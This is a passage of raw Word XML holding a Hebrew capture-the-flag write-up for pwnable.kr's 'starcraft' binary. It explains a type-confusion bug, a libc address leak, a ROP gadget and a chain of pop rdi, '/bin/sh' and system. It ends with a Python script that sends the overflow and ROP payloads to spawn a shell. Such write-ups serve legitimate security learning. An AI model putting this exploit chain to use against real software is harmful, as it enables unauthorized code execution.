      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות מטיפוס </w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:t>cron *</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> למרות שבריצה רגילה הוא מטיפוס </w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:t>Zerg *</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אבל המקרה שמעניין אותנו הוא כאשר </w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מטיפוס </w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:t>Acron *</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714B663" w14:textId="50F0E7B9" w:rsidR="00E3301F" w:rsidRDefault="00D47C7B" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47C7B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="517EB3D2" wp14:editId="2A6DCA26">
            <wp:extent cx="5274310" cy="4733290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ED4" w14:textId="51E0518A" w:rsidR="00D47C7B" w:rsidRDefault="00D47C7B" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47C7B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57704322" wp14:editId="754E24A2">
            <wp:extent cx="5274310" cy="1243330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="28" name="תמונה 2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תמונה שמכילה טקסט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A2F" w14:textId="0B68DE10" w:rsidR="00D47C7B" w:rsidRDefault="00D47C7B" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ניתן לראות ש </w:t>
      </w:r>
      <w:r>
        <w:t>is burrowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ו- </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> burrow-able</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מדפיסים את החצי הנמוך והגבוה של הכתובת של הפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. מהכתובת של </w:t>
      </w:r>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ניתן לחשב את כתובת הבסיס של </w:t>
      </w:r>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. כלומר יש כאן דליפה של כתובת הבסיס של </w:t>
      </w:r>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המאפשרת לגלות את הכתובת האקראית של הספריה בכל הרצה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511BB326" w14:textId="1EFEB3B7" w:rsidR="00D47C7B" w:rsidRDefault="00DC4E69" w:rsidP="000A39A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כדי לפתור את הבעיה השניה (קריאה לפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עם פרמטרים) נזכר שאמנם הכתובת של המחסנית לא ידועה אבל תמיד ראש המחסנית נמצא בפוינטר </w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. כזכור התחלנו בכך שניתן לדרוס את המחסנית ע"י חריגה ממשתנה מקומי שבפונקציה </w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. כאשר המשתמש מת וקוראים ל</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אנחנו נמצאים בתוך פונקציה שתחת </w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (כלומר </w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> קראה לפונקציה שהיא קראה לפונקציה וכן הלאה עד הפונקציה שלנו) כלומר מה שנחוץ הוא להרים את </w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדי שראש המחסנית יהיה באזור שאנחנו יכולים לדרוס. ולכן נשתמש ב</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:t>rop</w:t>
      </w:r>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (מתוך האתר </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="000A39A8" w:rsidRPr="008D4409">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ropshell.com/ropsearch?h=b0097c8a9284b03b412ff171c3d3c9cc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000A39A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F63DD" w14:textId="77777777" w:rsidR="000A39A8" w:rsidRPr="000A39A8" w:rsidRDefault="000A39A8" w:rsidP="000A39A8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2F2F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urier New"/>
          <w:color w:val="DDDDDD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A39A8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DDDDDD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x0008e7be : add rsp, 0x100; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A86AAD" w14:textId="2F621EDF" w:rsidR="000A39A8" w:rsidRDefault="000E5021" w:rsidP="000E5021">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>מה שנשאר הוא</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לשים את הכתובת של </w:t>
      </w:r>
      <w:r>
        <w:t>"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (המחרוזת כבר נמצאת ב</w:t>
      </w:r>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בגרסה שעל השרת של </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="008D4409">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pwnable.kr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. אבל גם אם לא</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> היינו יכולים לרשום את המחרוזת על המחסנית ולהשתמש ב</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-ים נוספים)</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">, לעשות </w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:t>pop rdi</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ואז לקרוא ל</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (כמובן בעזרת חזרה לכתובת של </w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00CD4547">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA1F34" w14:textId="375B7260" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="000E5021">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כמובן צריך גם להריץ ולראות איפה בדיוק נופל </w:t>
      </w:r>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כאשר מוסיפים לו 100 מהרצה שעשיתי מצאתי כי לאחר </w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ההוספה הנ"ל ל</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ו-</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> התכנית חוזרת לכתובת השמורה בבית התשיעי של </w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:t>haystack</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DDE4A9" w14:textId="64933694" w:rsidR="00565CB1" w:rsidRDefault="00CC4CDC" w:rsidP="00CC4CDC">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">דוגמה לקוד </w:t>
      </w:r>
      <w:r>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שבו השתמשתי (ידנית ב</w:t>
      </w:r>
      <w:r>
        <w:t>interpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>) כדי ליישם בפועל את הפריצה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99FC11" w14:textId="7EA1A839" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>import subprocess, threading, os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF9875" w14:textId="409E051B" w:rsidR="00CC4CDC" w:rsidRDefault="00CC4CDC" w:rsidP="00CC4CDC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t># runs in the background thread and prints the stdout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67D564" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>def thread_func(process):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13724688" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  data = os.read(process.stdout.fileno(), 1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220883C9" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  while data != b'':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB46839" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(data.decode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F2103" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = os.read(process.stdout.fileno(), 1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46721C73" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BA2FA3" w14:textId="1EF71584" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08012C9E" w14:textId="11E039EF" w:rsidR="00CC4CDC" w:rsidRDefault="00CC4CDC" w:rsidP="00CC4CDC">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># main thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC23B1B" w14:textId="0936C1AB" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p = subprocess.Popen('./starcraft', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) ; read_thread = threading.Thread(target=thread_func, args=(p,)) ; read_thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B073F9" w14:textId="505DC96F" w:rsidR="00CC4CDC" w:rsidRDefault="00CC4CDC" w:rsidP="00CC4CDC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39058715" w14:textId="092D02C4" w:rsidR="00CC4CDC" w:rsidRDefault="00CC4CDC" w:rsidP="00CC4CDC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t># write manually according to the program output!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562722B" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'6\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2C305" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'1\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C04F5" w14:textId="77777777" w:rsidR="008C7ED8" w:rsidRDefault="008C7ED8" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'0\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC63C3" w14:textId="6D4EABBE" w:rsidR="008C7ED8" w:rsidRDefault="008C7ED8" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t># ….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0D632" w14:textId="0FA898C2" w:rsidR="008C7ED8" w:rsidRDefault="00CC4CDC" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="008C7ED8">
        <w:t xml:space="preserve">on level &gt;= 12 choose illegal attack number </w:t>
      </w:r>
      <w:r w:rsidR="008C7ED8">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008C7ED8">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="008C7ED8">
        <w:t>leak the exit address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9055F" w14:textId="681808A0" w:rsidR="00CD489A" w:rsidRDefault="00CD489A" w:rsidP="00CD489A">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'2\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238002CF" w14:textId="7D775D9B" w:rsidR="00565CB1" w:rsidRDefault="008C7ED8" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00CC4CDC">
        <w:t>change to the correct values!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F88B7B" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>low= -795025344</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B9DB6" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>high=32573</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE3985" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>real_exit=int(hex(high)+hex(low+2**32)[2:],16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E15F8F" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>virtual_exit=int('3A040',16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D942D4A" w14:textId="13C21C11" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00CC4CDC">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>target=int('8E7BE',16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289A459A" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>insert=(real_exit-virtual_exit+target).to_bytes(8, byteorder='little')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C4425" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>virtual_system=int('453A0',16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DEF90F" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>virtual_pop_rdi=int('21112',16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2DAE3" w14:textId="7E1F8E55" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>virtual_bin_sh=int('18CE57',16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB43DDD" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>insert3=(real_exit-virtual_exit+virtual_system).to_bytes(8, byteorder='little')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B60375" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>insert1=(real_exit-virtual_exit+virtual_pop_rdi).to_bytes(8, byteorder='little')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C13B2" w14:textId="1BA44BE4" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>insert2=(real_exit-virtual_exit+virtual_bin_sh).to_bytes(8, byteorder='little')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81F564" w14:textId="6693174B" w:rsidR="00565CB1" w:rsidRDefault="008C7ED8" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># on level &gt;= 12 choose illegal attack number 1 to overwrite the exit pointer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAFD571" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'1\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C4CC6" w14:textId="77777777" w:rsidR="00565CB1" w:rsidRDefault="00565CB1" w:rsidP="00565CB1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'\x00'*8*33+insert+b'\x00\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF587F8" w14:textId="77777777" w:rsidR="008C7ED8" w:rsidRDefault="008C7ED8" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># when enemy dies on level&gt;=12 choose to cheat and insert this as command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E1DFF" w14:textId="5B580197" w:rsidR="008C7ED8" w:rsidRDefault="008C7ED8" w:rsidP="008C7ED8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>p.stdin.write(b'A'*8+insert1+insert2+insert3+b'C'*8+b'\n'); p.stdin.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41D957" w14:textId="64D969D4" w:rsidR="00C17449" w:rsidRDefault="00C17449" w:rsidP="00C17449">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BDDE62" w14:textId="40D65361" w:rsidR="00C17449" w:rsidRDefault="00C17449" w:rsidP="00C17449">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>דוגמה להרצה:</w:t>
      </w:r>
    </w:p>
